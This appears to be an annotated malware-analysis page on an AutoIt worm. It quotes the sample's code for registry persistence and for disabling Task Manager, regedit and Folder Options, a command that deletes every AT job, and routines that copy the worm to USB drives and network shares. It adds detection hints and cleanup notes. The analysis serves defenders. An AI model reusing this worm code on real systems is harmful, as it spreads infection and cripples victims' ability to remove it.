AutoIt在线文档
注册表行为
设置开机自启(写入 HKLM 下的 Winlogon\Shell 需要管理员权限;HKCU 下的 Run 项在普通用户权限下即可写入,两处写入的返回值样本均未检查)
; Persistence, as observed in the sample. Two registry entries are written:
;  1) HKLM ...\Winlogon\Shell = "Explorer.exe <name><exe>" — the worm is started
;     together with the shell at every logon, for all users. Writing HKLM needs
;     elevated rights; the return value is not checked, so on failure only the
;     HKCU entry below remains.
;  2) HKCU ...\Run value named "Yahoo Messengger" (sic — the misspelling is the
;     sample's literal, do not "fix" it) pointing at @SystemDir\<name><exe>.
; $name / $exe are defined outside this listing; a later comment in the sample
; refers to RVHOST.exe — confirm against the actual binary.
; Detection hint: a Winlogon Shell value that is not plain "explorer.exe", and a
; Run value with the misspelled name.
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
禁用资源管理器中的“文件夹选项”(NofolderOptions=1),受害者无法再修改隐藏文件/扩展名的显示设置
; Explorer policy: NofolderOptions=1 removes the "Folder Options" dialog, so the
; victim cannot change hidden-file / extension display settings. Presumably this
; helps the dropped "New Folder.exe" / "<dirname>.exe" copies pass as folders.
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)
禁用任务管理器(DisableTaskMgr=1),妨碍受害者手动结束样本进程
; System policy: DisableTaskMgr=1 blocks Task Manager for the current user
; (HKCU scope only). Cleanup: delete this value or set it to 0.
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
禁用注册表编辑器(DisableRegistryTools=1),妨碍受害者手动清除上述持久化项
; System policy: DisableRegistryTools=1 blocks regedit for the current user,
; making manual removal of the persistence entries harder. Cleanup can be done
; with reg.exe or from another account.
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
将 AT 计划任务的最大运行时长(Schedule 服务的 AtTaskMaxHours)设为 0,即不限制任务运行时间
; Task Scheduler (Schedule service) setting: AtTaskMaxHours=0 removes the
; run-time limit on AT jobs, so the AT-started copy (see the AT command further
; down) is not killed after the default maximum. HKLM write — needs elevation.
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)
读取资源管理器缓存的局域网共享列表(WorkgroupCrawler\Shares)下的 shared 值;该值由下文 copynetwork() 在传播结束时写入,可作为感染痕迹
; Reads the "shared" value under Explorer's cached workgroup-share list. This is
; the same value copynetwork() writes at the end of its run (the last UNC target
; it dropped to), so it doubles as an infection marker; how $a is used afterwards
; is outside this listing.
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")
计划任务行为
用到的函数
注:_RunDOS 通过 cmd.exe /C 以隐藏窗口(@SW_HIDE)执行命令,并等待命令结束后返回其退出码
; Runs $sCommand through the command interpreter (@ComSpec, i.e. cmd.exe) with
; /C, in a hidden window, and waits for it to finish.
; Returns: the exit code of the spawned process (RunWait's return value).
; $sCommand is concatenated into the command line unescaped — only constant
; strings are passed in this sample.
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
删除本机所有已存在的 AT 计划任务(AT /delete /yes,不提示确认)
; Wipes every existing AT job (/yes suppresses the confirmation prompt) before
; the sample schedules its own. Side effect worth noting in IR: legitimate AT
; jobs on the host are lost.
_RunDOS ("AT /delete /yes")
每天(周一至周日)09:00 以交互方式(/interactive)运行 @SystemDir 下的样本;AT 服务在较新的 Windows 版本中已弃用,此机制在现代系统上可能不生效
; Schedules @SystemDir\<name><exe> to run every day at 09:00 (/EVERY lists all
; seven days) in interactive mode. Note the scheduled path is @SystemDir while
; the spreaders below copy from @WindowsDir — confirm where the sample resides.
; AT.exe is deprecated on modern Windows, so this leg may silently fail there.
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
横向传播行为
用到的函数
; Recursive dropper shared by the USB and network-share spreaders below.
; Walks every entry under $current; for each subdirectory it copies the worm
; body (@WindowsDir\<name><exe>) into that directory as "<dirname><exe>" (a
; folder look-alike), then recurses into it. $name / $exe are defined outside
; this listing.
; Review notes on the sample as written:
;  - ($file <> "." Or $file <> "..") is always true (a name cannot equal both),
;    so the intended "." / ".." guard does nothing; whether the enumeration
;    actually returns "." and ".." depends on the AutoIt version — verify.
;  - FileFindFirstFile's handle is not checked for failure; with an invalid
;    handle FileFindNextFile sets @error and the loop exits on the first pass.
;  - FileCopy flag 0 = do not overwrite; an existing "<dirname><exe>" is left
;    alone and the return value is ignored.
;  - Recursion is unbounded; over UNC paths (copynetwork) this can run for a
;    long time. Sleep(1) only yields briefly per entry.
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
; Iterate all entries; for directories, drop a copy named "<dirname><exe>" and recurse.
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
; Intended: "is a directory and not . or .." — the second test is a tautology (see above).
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
U盘横向传播
; Removable-media spreader. Enumerates removable drives and drops the worm body
; as "<drive>\New Folder.exe" on the first one; if the first is A: (floppy) it
; uses the second instead. It then runs Search() over that drive so every
; subfolder also receives a "<folder><exe>" copy.
; Review notes on the sample as written:
;  - $usb has 10 slots (0..9) but the loop copies all $odia[0] drives into it;
;    with 10 or more removable drives this indexes past the array.
;  - Only $usb[1] and $usb[2] are ever used; any further drives are ignored.
;  - FileCopy flag 0 = do not overwrite; results are not checked.
; Detection hint: "New Folder.exe" in the root of removable media.
Func copyusb()
Dim $usb[10]
$usb[0]=""
$usb[1]=""
$usb[2]=""
; Get the list of removable drives ($odia[0] holds the count).
$odia = DriveGetDrive("REMOVABLE")
If NOT @error Then
For $i=1 To $odia[0]
$usb[$i]=$odia[$i]
Next
; First removable drive, unless it is the floppy.
If $usb[1] <>"A:" Then
If $usb [1] <>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
Search($usb[1])
EndIf
EndIf
; First drive is A: — fall back to the second removable drive, if any.
If $usb[1]="A:" Then
If $usb[2]<>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
Search($usb[2])
EndIf
EndIf
EndIf
EndFunc
局域网横向传播
; Network-share spreader. Enumerates up to 30 subkeys of Explorer's cached
; workgroup-share list (WorkgroupCrawler\Shares); each subkey name is turned
; into a UNC path by replacing "/" with "\" and prefixing "\\". The worm body
; is copied there as "New Folder.exe" (flag 1 = overwrite) and, on success,
; Search() recurses through the share. Finally the last UNC target is stored
; in the "shared" value of the same key.
; Review notes on the sample as written:
;  - $mang has 30 slots (0..29) but $i runs 1..30; with 30 cached shares the
;    last iteration indexes past the array.
;  - If the very first RegEnumKey fails, the loop exits with $i = 1 and the
;    final RegWrite stores $mang[0] (empty) & "\New Folder.exe".
;  - No credentials are supplied; the copy only succeeds where the current
;    user already has write access to the share.
; Detection hint: unexpected "New Folder.exe" on shares, and the "shared"
; value under WorkgroupCrawler\Shares populated with a UNC path.
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i) ; enumerate subkeys
If @error Then ExitLoop
$read = StringReplace ($read,"/","\") ; replace "/" with "\"
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1) ; copy RVHOST.exe to the share as New Folder.exe, overwriting
; On success, spread through the share.
If $checkcopy =1 Then
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc